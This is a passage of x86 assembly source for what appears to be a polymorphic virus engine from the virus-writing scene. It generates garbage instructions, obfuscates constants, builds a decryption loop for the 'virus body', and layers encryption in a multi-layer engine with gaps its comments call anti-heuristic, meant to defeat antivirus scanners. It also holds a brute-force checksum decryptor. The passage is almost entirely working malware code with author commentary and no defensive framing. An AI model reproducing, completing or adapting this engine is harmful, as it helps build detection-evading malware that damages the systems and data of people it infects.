g_compare:

		; do not recursived - because it's few registers
		cmp	byte ptr [ebp+recursive_level],01h
		jnz	a_compare

		; have we some free place in rnd_fill ?
		cmp	byte ptr [ebp+compare_index],00h
		jz	a_compare

		; this garbage only in the main loop
		cmp	byte ptr [ebp+gl_index_reg],-1
		jz	a_compare

		; save used-regs
		mov	al,[ebp+used_regs]
		push	eax

		; select a free base-reg to DEC
		call	 gen_garbage
		call	ppe_get_empty_reg
		call	__reg_to_bcd
		or	[ebp+used_regs],ah
		mov	al,48h			;DEC
		or	al,byte ptr [ebx]
		stosb

		call	gen_garbage

		; build CMP instruction
		mov	edx,ebx
	__gc_new_reg:
		call	ppe_get_reg
		cmp	ebx,edx 		;i don't want same regz
		jz	__gc_new_reg
		mov	ah,byte ptr [edx]	;reg to AH
		shl	ah,03h			; * 8
		or	ah,al
		or	ah,0C0h
		mov	al,3Bh			;CMP ...
		stosw

		call	gen_garbage_no_flags

		; build JNZ jmp
		mov	ax,850Fh		;JNZ far signature
		stosw
		movzx	eax,byte ptr [ebp+compare_index]
		call	ppe_get_rnd_range	;select <compare_index>
		mov	eax,[ebp+compare_buffer+04h*eax]
		add	eax,[ebp+poly_start]
		push	eax
		sub	eax,edi
		sub	eax,00000004h
		stosd

		call	gen_garbage

		; build JMP to rnd_fill
		pop	ecx			;EDI of rnd_fill_jmp in ECX
		mov	al,0E9h 		;JMP far signature
		mov	byte ptr [ecx],al
		mov	eax,edi
		sub	eax,ecx
		sub	eax,00000005h
		mov	dword ptr [ecx+00000001h],eax

		call	gen_garbage

		; destroy all rnd_fill buffers
		mov	byte ptr [ebp+compare_index],00h

		; restore used_regs
		pop	eax
		mov	[ebp+used_regs],al

a_compare:	ret

;ÄÄÄ´ function to fix delta for copro operations ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;If we generated offset of free memory (by __copro_get_mem)
		;then it's more then time to use delta.
		;
		;input:    EBX = offset to reg
__copro_fix_delta:
		mov	al,03h			;ADD instruction
		mov	ah,byte ptr [ebx]
		shl	ah,3
		or	ah,byte ptr [ebp+gl_index_reg]
		or	ah,0C0h
		stosw
		ret

__copro_unfix_delta:
		mov	al,2Bh			;SUB instruction
		mov	ah,byte ptr [ebx]
		shl	ah,3
		or	ah,byte ptr [ebp+gl_index_reg]
		or	ah,0C0h
		stosw
		ret

;ÄÄÄ´ function to crypt a destination value ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;   ÀÄÄÄÄÄÄÄÄÄ sado-maso function ÄÄÄÄÄÄÄÄÙ

		;---------------------------------------------------------
		;This function is for crypt a real value  which we want to
		;hide. I use only base-reg (eax,edi...) because If I would
		;like to  introduce the  coprocessor I'd have to  use FILD
		;and FIST instruction: FILD qword ptr [edi],  where  EDI I
		;wanted generate. At first I  generate code  for  encode a
		;destination value  and I find out a crypt  value.  During
		;encoding I save a opposite instruction to stack  (add <=>
		;sub). I could not to save decode instructions into a spe-
		;cial buffer because I didn't know a real size - the stack
		;is better for this.
		;
		;input:       EAX=destination value
		;	       BL=destionation register (not in BCD)
		;
		;used instructions: ADD opposite SUB and on the contrary
		;		    ROL opposite ROR
		;		    XOR reg <==> XOR reg
		;		    NOT reg <==> NOT reg
		;		    MOV reg1,reg2 <==> MOV reg2,reg1
		;
		;do you have anything else ?
		;
		;and now... example:
		;   * I want to generate number 0x402CC1 to EDX register
		;		    MOV   ESI, 1985FDD6
		;		    ROL   ESI, BB
		;		    MOV   EAX, ESI
		;		    NOT   EAX
		;		    MOV   EDX, EAX
		;		    SUB   EDX, 4FF3A350  ->EDX = 0x402CC1
		;
		;This is only example but reality it other... better !!!
		;
		actual_reg	db	?	;where we've our number which we're generating
		future_reg	db	?	;our destination register
		actual_instr	db	?	;actual instruction in generate
		old_place	dd	?	;where's start crypt value
		;
ppe_crypt_value:

		pusha

		mov	ecx,eax 		;save destination value
		mov	[ebp+old_place ],edi
		mov	[ebp+actual_reg],bl
		mov	[ebp+future_reg],bl

		; save destination value to destination reg
		mov	al,0B8h
		or	al,bl
		stosb				;select destination reg
		mov	eax,ecx
		stosd				;save destination value

		; how many instruction we'll use
		mov	eax,00000007h
		call	ppe_get_rnd_range
		inc	eax
		mov	byte ptr [ebp+actual_instr],al

		push	12345678h		;flag to stack
	__cv_next_loop:
		mov	eax,00000003h		;may I change register ?
		call	ppe_get_rnd_range
		or	eax,eax
		jnz	__cv_continue

		call	ppe_get_empty_reg	;i want a free register
		mov	al,08Bh
		mov	ah,byte ptr [ebx]	;my future reg32
		cmp	ah,byte ptr [ebp+actual_reg]
		jz	__cv_next_loop		;blah - mov ecx,ecx ??
		shl	ah,3
		or	ah,byte ptr [ebp+actual_reg]
		or	ah,0C0h
		stosw				;finish but now i must create opposite for decode
		mov	al,byte ptr [ebx]
		mov	ah,byte ptr [ebp+actual_reg]
		shl	ah,3
		or	ah,al
		or	ah,0C0h
		mov	byte ptr [ebp+actual_reg],al
		mov	al,08Bh
		push	ax			;ax = decode mov

	__cv_continue:
		mov	eax,(end_num_code - tbl_num_code) / 04h
		call	ppe_get_rnd_range

		lea	esi,[ebp+tbl_num_code+4*eax]
		lodsb				;load where we have encode instruction
		lodsw				;AH = base_reg, AL = id_operation
		or	ah,[ebp+actual_reg]
		push	ax			;save because of separate actual_reg
		stosw
		lodsb				;imm(X) = 3rd_number * 8
		mov	dl,al
		push	ax			;now, we must generate imm
	__cv_generate_imm:			;imm32 = (add,sub) reg32,imm32
		or	dl,dl			;imm8  = (rol,ror) reg32,imm8
		jz	__cv_opposite_code	;imm0  = not reg32
		call	ppe_get_rnd32
		rol	ebx,8			;save rnd number to EBX
		mov	bl,al
		stosb
		dec	dl
		jmp	__cv_generate_imm

	__cv_opposite_code:
		pop	ax			;ax = imm(X)
		pop	cx			;ch = reg32, cl = encode instruction
	__cv_oc_generate_imm:
		or	al,al			;is it imm0 ?
		jz	__cv_oc_imm_ok
		dec	esp			;save imm to stack
		mov	byte ptr ss:[esp],bl
		ror	ebx,8			;next number in imm
		dec	al
		jmp	__cv_oc_generate_imm

	__cv_oc_imm_ok:
		lea	esi,[esi-4]		;esi = start of encode instruction
		lodsb				;AL = opposite instruction (add <=> sub)
		movsx	eax,al			;is it previous or next instruction ?
		add	esi,eax 		;esi = decode instruction
		lodsb
		lodsw				;al = (en/de)code instruction
		and	ch,00000111b		;separate reg only
		or	ah,ch			;change register
		push	ax			;save encode instruction to stack

		dec	byte ptr [ebp+actual_instr]
		jnz	__cv_next_loop

		;now, we must find out the crypt value
		mov	ax,0C08Bh
		or	ah,byte ptr [ebp+actual_reg]
		stosw				;save destination value to EAX
		mov	al,0C3h
		stosb				;ret = out of call

		;to find out crypt value we must call decode function
		;output:	eax = crypt value
		pusha
		call	dword ptr [ebp+old_place]
		mov	[esp].access_eax,eax
		popa

		;save into last_reg our crypt value
		mov	edi,[ebp+old_place]
		push	eax
		mov	al,0B8h
		or	al,byte ptr [ebp+actual_reg]
		stosb
		pop	eax
		stosd

		;now, we must write decode instructions to old EDI
	__cv_oc_out_of_stack:
		cmp	dword ptr ss:[esp],12345678h
		jz	__cv_oc_finish
		mov	al,byte ptr ss:[esp]
		inc	esp
		stosb
		jmp	__cv_oc_out_of_stack
	__cv_oc_finish:
		pop	eax			;flag from stack

		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ last decoding loop ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function encrypts virus body like 3rd decoding loop.
		;The algorithm is in front of the virus. It  means, multi-
		;layer algorithm is behind virus, then is jump to back and
		;then is next decoding loop.
		;
		__pllg_memory	dd	00000000h	;decoding loop mem
		__pllg_countreg db	00h		;counter register
		__pllg_indexreg db	00h		;index register
		__pllg_codereg	db	00h		;code register
		__pllg_lsize	dd	00000000h	;loop size
		;
ppe_lloop_generate:

		; save all registers
		pusha

		; allocate memory for decoding loop
		mov	eax,10000
		call	malloc
		mov	[ebp+__pllg_memory],eax
		mov	edi,eax

		; generate index and its register
		call	gen_garbage
	__pllg_new_reg:
		call	ppe_get_empty_reg
		cmp	al,00000100b
		jae	__pllg_new_reg
		call	__reg_to_bcd
		mov	bl,al
		mov	[ebp+__pllg_indexreg],bl
		or	[ebp+used_regs],ah
		mov	al,0E8h 	       ;CALL
		stosb
		xor	eax,eax
		stosd
		mov	al,58h
		add	al,[ebp+__pllg_indexreg]
		stosb
		mov	ax,0C081h
		add	ah,[ebp+__pllg_indexreg]
		stosw
		push	edi
		add	edi,00000004h	       ;do place for ADD

		; generate counter register
		call	gen_garbage
		call	ppe_get_empty_reg
		call	__reg_to_bcd
		mov	bl,al
		mov	[ebp+__pllg_countreg],al
		or	[ebp+used_regs],ah
		call	ppe_get_rnd32
		push	eax
		call	ppe_crypt_value

		; generate code register
		call	gen_garbage
		call	ppe_get_empty_reg
		call	__reg_to_bcd
		mov	bl,al
		mov	[ebp+__pllg_codereg],bl
		or	[ebp+used_regs],ah
		call	ppe_get_rnd32
		call	ppe_crypt_value

		; generate XOR machanism
		push	edi
		call	gen_garbage
		mov	ah,[ebp+__pllg_codereg]
		shl	ah,03h
		add	ah,[ebp+__pllg_indexreg]
		mov	al,31h
		stosw
		call	gen_garbage

		; generate next index value
		mov	ah,0C0h
		add	ah,[ebp+__pllg_indexreg]
		mov	al,83h
		stosw
		mov	al,04h
		stosb
		call	gen_garbage

		; geneerate next counter value
		mov	al,40h
		add	al,[ebp+__pllg_countreg]
		stosb
		call	gen_garbage

		; generate comparing
		mov	ax,0F881h
		add	ah,[ebp+__pllg_countreg]
		stosw
		mov	eax,[esp+4]
		add	eax,file_size shr 2
		stosd
		call	gen_garbage_no_flags
		mov	ax,850Fh		;JNZ identification
		stosw
		mov	eax,[esp]
		sub	eax,edi
		sub	eax,4
		stosd
		call	gen_garbage

		; generate do-nothing instructions
		mov	al,0C3h
		push	edi
		stosb
	__pllg_align:
		mov	eax,edi
		sub	eax,[ebp+__pllg_memory]
		mov	ebx,8
		xor	edx,edx
		div	ebx
		or	edx,edx
		jz	__pllg_finish
		mov	al,90h
		stosb
		jmp	__pllg_align
	__pllg_finish:

		; change index value
		mov	eax,edi
		sub	eax,[esp+0ch]
		add	eax,00000003h
		mov	ebx,[esp+0ch]
		mov	[ebx],eax

		; do place for this algorithm
		push	edi
		mov	esi,[ebp+mem_address]
		add	edi,esi
		sub	edi,[ebp+__pllg_memory]
		mov	ecx,edi
		sub	ecx,esi
		mov	[esi+__pllg_lsize-virus_start],ecx
		add	ecx,file_size
		mov	[ebp+file_size2],ecx
		mov	[ebp+file_size3],ecx
		shr	[ebp+file_size2],03h
		call	__movsd_back

		; copy this algorithm
		mov	esi,[ebp+__pllg_memory]
		mov	edi,[ebp+mem_address]
		pop	ecx
		sub	ecx,[ebp+__pllg_memory]
		rep	movsb

		; run that algorithm
		pusha
		mov	eax,[ebp+mem_address]
		call	eax
		popa
		mov	eax,[esp]
		sub	eax,[ebp+__pllg_memory]
		add	eax,[ebp+mem_address]
		mov	byte ptr [eax],90h

		; dealloc memory
		mov	eax,[ebp+__pllg_memory]
		call	mdealloc
		xor	eax,eax
		mov	[ebp+__pllg_memory],eax

		; restore all registers
		mov	[ebp+used_regs],00h
		add	esp,4*4
		popa
		ret

;ÄÄÄ´ multi-layer engine ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function generates multi-layer map. And because I am
		;crazy, this is true multi-layer engine. So look here:
		;
		; Every polymorphic en-    vs.	 Every multi-layer engine
		; gine encodes l. this: 	 encodes  in  this   way:
		;      Â  (virus_start) 	    Â	      Â
		;      ³			    ³ 1st     ³ 2nd
		;      ³			    ³ layer   ³ layer
		;      ³			    ³	      ³
		;        (down or up)		    	            etc.
		;
		;But my multi-layer engine has these features:
		;   * randomly generated layer's movement (down or up)
		;   * maximal is 986 layers
		;   * typical is 68 layers
		;   * layers' buffer with gaps (anti-heuristic)
		;
		;My resulting coding progress:
		;      Â  Ú¿	     ù	     ù	   ¿  three layers
		;      ³Ú¿³³   ù   ù   ù   ù   ù   ´  five layers
		;      ³³³³³Ú¿ ù ù ù ù ù ù ù ù ù ù ´  seven layers
		;      ÀÙ³³³³³ ù ù ù ù ù ù ù ù ù ù Ù
		;	 ³³ÀÙ³
		;	 ÀÙ  ³
		;	     
		;
		;Here you can see I need layers buffer, where I have all
		;movement (down and up). Every byte has this structure:
		;
		;      8th bit (down/up), 7th-1st bit (+/- movement)
		;
		;Some equations:
		;  * maximum layers:
		;     ((file_size-2^7*4)/(layer_buf-file_size-2^7*4))/2=968
		;  * typical layers:
		;     2^7 * 4 * layer_buf / file_size = 68
		;
		;Where:
		;  * file_size = calculated for 18,000 bytes
		;  * layer_buf = calculated for 2,400 bytes
		;  * 2^7 = we have eight bites without one (+/-)
		;  * 4 = we use dword, not byte
		;
		;The layers buffer is behind polymorphic loop, and it cer-
		;tains anti-heuristic :), because in that buffer are gaps.
		;And these treatments are inside polydecoding loop.
		;
		;
		__mlg_map	dd	00000000h	;layers memory map
		__mlg_size	dd	00000000h	;size of layer buffer
		file_size2	dd	00000000h	;(file_size+3rd l.)/8
		file_size3	dd	00000000h	;file_size2 * 8
		;
ppe_mlayer_generate:

		; save all registers
		pusha

		; allocate memory for layer map
		push	00000000h		;number of encrypted bytes
		mov	eax,000000C9h		;get size of layers map
		call	ppe_get_rnd_range	;maximum is 2,600 bytes
		shl	eax,03h 		;multiply by eight
		add	eax,1000
		push	eax			;[ESP] = size of layers map
		shr	dword ptr [esp],03h	;divide by eight
		call	malloc			;allocate that memory
		mov	[ebp+__mlg_map],eax

		; generate eight parts
		mov	edi,[ebp+__mlg_map]	;EDI = memory layers map
		xor	ecx,ecx 		;ECX = actual part
		xor	edx,edx 		;EDX = position in layer
		call	__mlg_gen_max_movement
		mov	byte ptr [edi],al	;the first movement
		movzx	ebx,al			;EBX = position in vbody
		inc	edi			; + memory layer map
		inc	edx			; + pos in actual layer
	__mlg_next_movement:
		call	__mlg_gen_max_movement	;generate new movement (+/-)
		jc	__mlg_no_compare	;if AL==0, then "go up" flag
		push	eax
		mov	eax,00000003h		; 2 * DOWN, 1 * UP
		call	ppe_get_rnd_range
		or	al,al			;go back ? (it means UP !)
		pop	eax			;movement
		jnz	__mlg_go_down
		cmp	ebx,eax 		;EBX - EAX < 0 ?
		jb	__mlg_go_down		;if yes, go down, not up
	    __mlg_no_compare:
		sub	ebx,eax 		; = actul pos in vbody
		or	al,80h			;set "go up" flag
		jmp	$ + 00000004h
	    __mlg_go_down:
		add	ebx,eax 		; = actual pos in vbody
		mov	byte ptr [edi],al	;write new movement (+/-)
		inc	edi			; + memory layer map
		inc	edx			; + pos in actual layer
	__mlg_compare:
		cmp	edx,[esp]		;EDX == size of layers map/8
		jb	__mlg_continue
		inc	ecx			;next part
		xor	edx,edx 		;position in layer
		add	[esp+00000004h],ebx	;number of encrypted bytes
		cmp	ecx,00000008h		;was it last part ?
		jnz	__mlg_no_last
		mov	ebx,[ebp+file_size3]	;file_size + 3rd_loop
		sub	ebx,[esp+00000004h]	;encrypted bytes
		neg	ebx			; - EBX
		jmp	$ + 00000008h
	    __mlg_no_last:
		sub	ebx,[ebp+file_size2]	;EBX < file_size2 ?
		mov	esi,ebx 		;my the only one empty reg :)
		bt	esi,3Fh
		jnc	__mlg_continue		;no bytes to down ? ESI > 0 ?
	    __mlg_no_last_next:
		call	__mlg_gen_max_movement_without_test
		push	esi			;ESI + EAX <= 0, then okay
		add	esi,eax 		;ESI + EAX >  0, then again
		or	esi,esi 		;set (Z)ero flag
		bt	esi,3Fh 		;set (C)arry flag
		pop	esi
		jc	$ + 00000004h		;all right
		jnz	__mlg_no_last_next	;ESI + EAX > 0
		add	[esp+00000004h],eax	;number of encrypted bytes
		mov	byte ptr [edi],al	;and write that...
		inc	edi			; + memory layer map
		inc	edx			; + pos in actual layer
		add	ebx,eax 		;position in vbody
		add	esi,eax 		;ESI += EAX, bytes to down
		bt	esi,3Fh 		;ESI > 0 ?
		jc	__mlg_no_last_next
	__mlg_continue:
		cmp	ecx,00000008h		;last part ?
		jnz	__mlg_next_movement	;next and next loop...
		sub	edi,[ebp+__mlg_map]	;number of encrypted bytes
		mov	[ebp+__mlg_size],edi

		; encrypt the encrypted virus body by 3rd decoding loop :)
		mov	esi,[ebp+__mlg_map]	;layers memory map
		mov	edi,[ebp+mem_address]
		mov	edx,[ebp+__mlg_size]	;size of layers buffer
		mov	ebx,[ebp+code_value]
	__mlg_next_byte:
		lodsb				;load movement
		movzx	ecx,al			;convert to ECX & 7Fh
		and	cl,7Fh			;clear (+/-) flag
		sub	ebx,[ebp+code_value_add] ;damn bug !
	__mlg_next_dword:
		cmp	byte ptr [ebp+crypt_style],02h
		jz	__mlg_xor
		cmp	byte ptr [ebp+crypt_style],01h
		jz	__mlg_add
		sub	byte ptr [edi],bl
		jmp	__mlg_next_value
	__mlg_add:
		add	byte ptr [edi],bl
		jmp	__mlg_next_value
	__mlg_xor:
		xor	byte ptr [edi],bl
	__mlg_next_value:
		inc	edi			;next value (+)
		rol	ebx,01h 		;bits rotate
		test	al,80h			;check that flag
		jz	__mlg_go_cow
		sub	edi,00000002h		;next value (-)
	__mlg_go_cow:
		dec	cl			;next byte (value)
		jnz	__mlg_next_dword
		bt	eax,7			;test 7th bit
		jc	__mlg_back
		test	byte ptr [esi],80h	;forward and back now ?
		jz	__mlg_fback
		dec	edi
		jmp	__mlg_fback
	__mlg_back:
		test	byte ptr [esi],80h	;back and forward now ?
		jnz	__mlg_fback
		inc	edi
	__mlg_fback:
		dec	edx			;next movement
		jnz	__mlg_next_byte

		; generate the 5th number of CRC-getting
	__pbi_again:
		mov	eax,00DFFFFFh		;maximum searching number
		call	ppe_get_rnd_range
		cmp	eax,10000h
		jb	__pbi_again
		mov	[ebp+__pbi_last_num],eax
		sub	ebx,eax
		mov	[ebp+__pbi_add_num],ebx

		; restore all registers
		add	esp,00000008h
		popa
		ret

	__mlg_gen_max_movement_without_test:
		mov	eax,00000080h		;generate <0,128) number
		call	ppe_get_rnd_range
		or	al,al
		jz	__mlg_gen_max_movement_without_test
		ret

	__mlg_gen_max_movement:
		call	__mlg_gen_max_movement_without_test
		cmp	ebx,[ebp+file_size2]
		jz	__mlg_gmm_failed
		push	eax			;i haven't any empty reg
		add	eax,ebx
		cmp	eax,[ebp+file_size2]	;EBX+EAX > file_size2 ?
		pop	eax			;if yes, generate other
		ja	__mlg_gen_max_movement	;number
		test	al,0F9h 		;hidden STC instruction
	    __mlg_gmm_failed equ $-1
		ret

;ÄÄÄ´ brute-attack engine ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;Welcome to my brute-attack engine  in poly-decoding loop.
		;At first I generate five valuez and their checksum,  then
		;I'll store that checksum and I will find right five value
		;by its checksum. Maximal value of 5th number is 0xDFFFFF.
		;This number I'll find per 0.82 second on P233. And I know
		;it's very good result.
		;
		;I would like to thank Darkman/29A for his:
		;   * "RDEA" article in 29A #3 issue
		;   * ideas and theory
		;
		;This function is only for you... your ideas...
		;
		;
		__pbi_nums	dd	4 dup(0)	;global numbers
		__pbi_last_num	dd	00000000h	;last number
		__pbi_add_num	dd	00000000h	;absolute number
		__pbi_start_crc dd	00000000h	;startup checksum
		__pbi_last_crc	dd	00000000h	;finishing checksum
		__pbi_regs	db	3 dup(0)	;three registers
		;
ppe_brute_init:

		; save all registers
		pusha

		; change "poly_start" value
		mov	edi,[ebp+mem_address]
		add	edi,[ebp+file_size3]	;new position
		mov	[ebp+poly_start],edi	;file_size + 3rd loop

		; generate four numbers
		mov	ecx,00000004h		;four numbers
	__pbi_next_number:
		call	ppe_get_rnd32		;generate random number
		mov	[ebp+__pbi_nums+ecx*4-4],eax
		loop	__pbi_next_number

		; calculate some checksums...
		xor	ecx,ecx 		;counter
		xor	eax,eax 		;calculate register
	__pbi_calculate:
		add	eax,[ebp+__pbi_nums+ecx*4]
		rol	eax,01h
		xor	eax,0ACD78FA3h
		inc	ecx			;next number
		cmp	ecx,00000004h		;ECX == numbers - 1 ?
		jnz	__pbi_cfinish
		mov	[ebp+__pbi_start_crc],eax ;save that value
	__pbi_cfinish:
		cmp	ecx,00000005h
		jnz	__pbi_calculate
		mov	[ebp+__pbi_last_crc],eax ;save checksum

		; generate three needed registers
		mov	ecx,00000003h		;three registers
	__pbi_next_register:
		call	ppe_get_empty_reg
		call	__reg_to_bcd
		mov	[ebp+__pbi_regs+ecx-1],al
		or	[ebp+used_regs],ah
		loop	__pbi_next_register

		; generate old and new checksum
		call	gen_garbage		  ;use old checksum it means
		mov	eax,[ebp+__pbi_start_crc] ;without last right value
		mov	bl,[ebp+__pbi_regs]	  ;the first register
		call	ppe_crypt_value
		call	gen_garbage		  ;and use finishing crc
		mov	eax,[ebp+__pbi_last_crc]
		mov	bl,[ebp+__pbi_regs+01h]   ;the second register
		call	ppe_crypt_value
		call	gen_garbage
		xor	eax,eax 		;calculating register
		mov	bl,[ebp+__pbi_regs+02h] ;the third register
		call	ppe_crypt_value

		; own algorithm
		push	edi			;startup address
		mov	al,40h
		or	al,[ebp+__pbi_regs]	;old_reg++
		stosb
		mov	ah,[ebp+__pbi_regs+02h] ;mov calc_reg,old_reg
		shl	ah,03h
		or	ah,[ebp+__pbi_regs]	;old reg
		or	ah,0C0h
		mov	al,8Bh			;MOV instruction
		stosw
		mov	ax,0C0D1h		;rol calc_reg,01h
		or	ah,[ebp+__pbi_regs+02h]
		stosw
		mov	ax,0F081h		;xor reg32,imm32
		or	ah,[ebp+__pbi_regs+02h]
		stosw
		mov	eax,0ACD78FA3h		;special value
		stosd
		mov	ah,[ebp+__pbi_regs+02h]
		shl	ah,03h
		or	ah,[ebp+__pbi_regs+01h]
		or	ah,0C0h
		mov	al,3Bh
		stosw
		mov	ax,850Fh		;JNZ identification
		stosw
		pop	eax			;"go back" offset
		sub	eax,edi
		sub	eax,4
		stosd
		call	gen_garbage
		mov	byte ptr [ebp+used_regs],00h
		mov	al,[ebp+code_reg]	;code register
		call	__reg_to_bcd
		or	[ebp+used_regs],ah
		xchg	ah,al
		shl	ah,03h
		or	ah,[ebp+__pbi_regs]
		or	ah,0C0h
		mov	al,8Bh			;mov code_reg,reg32
		stosw
		call	gen_garbage
		mov	ax,0E881h		;sub code_reg,start_crc
		or	ah,[ebp+code_reg]
		stosw
		mov	eax,[ebp+__pbi_start_crc]
		stosd
		call	gen_garbage
		mov	ax,0C081h		;ADD instruction
		or	ah,[ebp+code_reg]
		stosw
		mov	eax,[ebp+__pbi_add_num]
		stosd
		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ generate code to get delta-address ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function gets delta. Useful forr "g_repeat", and all
		;calls and jmps garbages, for all iluzo jumps and so on...
		;
		__ppe_gd_call	 dd	 00000000h
		;
ppe_get_delta:

		; save registers
		pusha

		; prepare CALL
		call	gen_garbage
		mov	al,0E8h
		stosb
		stosd
		mov	[ebp+__ppe_gd_call],edi
		push	edi
		call	ppe_gen_rnd_block
		mov	eax,edi
		pop	esi
		sub	eax,esi
		mov	dword ptr [esi-00000004h],eax
		call	gen_garbage

		; now, we must active the global index register
		mov	al,[ebp+gl_index_reg2]
		mov	[ebp+gl_index_reg],al
		call	__reg_to_bcd
		or	[ebp+used_regs],ah
		mov	byte ptr [ebp+compare_index],00h

		mov	al,58h
		or	al,byte ptr [ebp+gl_index_reg]
		stosb				;POP base-reg32
		call	gen_garbage_no_flags	;'cause delta isn't finished

		; we must fix real address
		mov	eax,[ebp+__ppe_gd_call]
		sub	eax,[ebp+mem_address]
		sub	eax,[ebp+file_size3]
		push	eax

		; ADD or SUB ?
		call	ppe_get_rnd32
		and	al,1
		jz	__ppe_gd_sub

		; fix with ADD --> add reg32, fix_value
		mov	ax,0C081h
		or	ah,byte ptr [ebp+gl_index_reg]
		stosw
		pop	eax
		neg	eax
		jmp	__ppe_gd_fix_done

		; fix with SUB --> sub reg32, -fix_value
	__ppe_gd_sub:
		mov	ax,0E881h
		or	ah,byte ptr [ebp+gl_index_reg]
		stosw
		pop	eax

	__ppe_gd_fix_done:
		stosd

		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ generate layer gaps (anti-heuristic) ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function adds some gaps in multi-layers buffer. What
		;does it mean, gaps ? So, you will generate layers  map by
		;"ppe_mlayer_generate" function. There are only  movements
		;and AV can find that buffer and do all  alone, but here I
		;will generate some gaps,  and when  my poly find  certain
		;offset in that buffer, i'll add some value = anti-heuris-
		;tic. All is hiden by "ppe_crypt_value" as well.
		;
		;Behaviour:
		;  * get number of gaps
		;  * generate their position and size in layer buffer
		;  * run "bubble sort" algorithm
		;  * do gaps in buffer (generate random movement)
		;  * change positions
		;
		__pglg_num	dd	00000000h	;number of gaps
		__pglg_where	dd	8 dup(0,0)	;gaps, their size
		;
ppe_get_layer_gaps:

		; save all registers
		pusha

		; negate all movements
		mov	ecx,[ebp+__mlg_size]	;number of movements
		mov	esi,[ebp+__mlg_map]
	__pglg_negate:
		mov	ah,[esi]
		btc	ax,15			;negate 7th bit
		mov	[esi],ah
		inc	esi
		loop	__pglg_negate

		; exchange all movements (from end 2 start)
		mov	ecx,[ebp+__mlg_size]
		mov	esi,[ebp+__mlg_map]
	__pglg_exchange:
		mov	al,[esi+ecx-1]
		xchg	al,[esi]
		mov	[esi+ecx-1],al
		dec	ecx
		dec	ecx
		inc	esi
		cmp	ecx,00000002h
		jae	__pglg_exchange

		; generate random gaps
		mov	eax,00000009h		;number of gaps - 1
		call	ppe_get_rnd_range
		mov	[ebp+__pglg_num],eax	;actual gaps
		or	eax,eax 		;no gaps ?
		jz	__pglg_finish
		mov	edx,eax

	__pglg_next_gap:
		mov	eax,[ebp+__mlg_size]	;memory buffer size
		call	ppe_get_rnd_range
		or	eax,eax 		;don't support 1st place
		jz	__pglg_next_gap
		mov	[ebp+__pglg_where+edx*8-8],eax ;save position
		mov	eax,00000010h		;<0,10h) gap
		call	ppe_get_rnd_range
		inc	eax			;this was fucking bug
		mov	[ebp+__pglg_where+edx*8-4],eax ;and its size
		dec	edx			;next gap
		jnz	__pglg_next_gap
		cmp	[ebp+__pglg_num],00000001h
		jz	__pglg_moving

		; use "bubble sort"
		mov	ebx,[ebp+__pglg_num]		;for(x=7;x<=1;x--)
		mov	ecx,ebx 			;for(y=8-x;y<=1;y--)
		dec	ecx				;if(p[y]>p[y-1]){
	__pglg_bagain:					;x=p[y+1];p[y+1]=p[y]
		mov	edx,ebx 			;p[y]=x}
		sub	edx,ecx
	__pglg_bnext:					;...and it's all :)
		mov	eax,[ebp+__pglg_where+edx*8]
		cmp	eax,[ebp+__pglg_where+edx*8-8]
		ja	__pglg_bno_change
		xchg	eax,[ebp+__pglg_where+edx*8-8]
		mov	[ebp+__pglg_where+edx*8],eax
	__pglg_bno_change:
		dec	edx
		jnz	__pglg_bnext
		dec	ecx
		jnz	__pglg_bagain

		; it's time to do some place in the buffer
	__pglg_moving:
		mov	edx,[ebp+__pglg_num]	;number of gaps
	__pglg_next_moving:
		mov	ecx,[ebp+__mlg_size]	;buffer's size
		mov	esi,[ebp+__pglg_where+edx*8-8] ;position
		sub	ecx,esi
		add	esi,[ebp+__mlg_map]	;memory layers map
		mov	edi,[ebp+__pglg_where+edx*8-4] ;gap size
		add	ecx,edi
		add	edi,esi 		;destination place
		push	esi
		call	__movsd_back
		mov	ecx,[ebp+__pglg_where+edx*8-4]
		pop	edi			;do some random movement
		push	ecx
		mov	bl,[edi]		;get last bit (+/-) ?
	__pglg_generate:
		call	ppe_get_rnd32		;generate that...
		bt	bx,7			;to (C)arry
		jc	__pglg_2nd
		and	al,01111111b
		jmp	__pglg_1st
	    __pglg_2nd:
		or	al,10000000b		;set last bit
	    __pglg_1st:
		stosb				;...and store one
		loop	__pglg_generate
		pop	ecx

		; well, build next anti-heuristic...
		add	[ebp+__mlg_size],ecx	; + gap size
		dec	edx
		jnz	__pglg_next_moving

		; change positions
		xor	eax,eax
	__pglg_cpos:
		mov	ebx,[ebp+__pglg_num]	;this was last fucking bug,
		dec	ebx			;belive me, it's needless
		cmp	edx,ebx 		;to explain something :)
		jz	__pglg_finish
		inc	edx
		add	eax,[ebp+__pglg_where+edx*8-4]
		add	[ebp+__pglg_where+edx*8],eax
		jmp	__pglg_cpos

	__pglg_finish:
		popa
		ret

;ÄÄÄ´ generate code to set index for decode-loop ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function gets start of virus body to reg32.
		;
ppe_get_index:

		; save all registers
		pusha
		call	gen_garbage

		; crypt a start of decoding
		mov	al,[ebp+index_reg]
		movzx	ebx,al
		call	__reg_to_bcd
		or	[ebp+used_regs],ah
		mov	eax,-1			;start of decoding...
		call	ppe_crypt_value 	;go !
		lea	ebx,[ebp+tbl_regs+ebx*02h]
